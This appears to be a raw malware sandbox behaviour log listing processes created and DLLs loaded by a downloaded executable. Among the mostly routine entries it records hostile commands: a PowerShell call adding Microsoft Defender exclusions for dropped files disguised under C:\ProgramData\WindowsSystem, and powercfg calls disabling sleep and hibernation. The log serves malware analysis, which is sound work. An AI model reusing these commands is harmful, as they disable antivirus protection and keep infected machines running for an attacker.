                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}Jump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""Jump to behavior
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
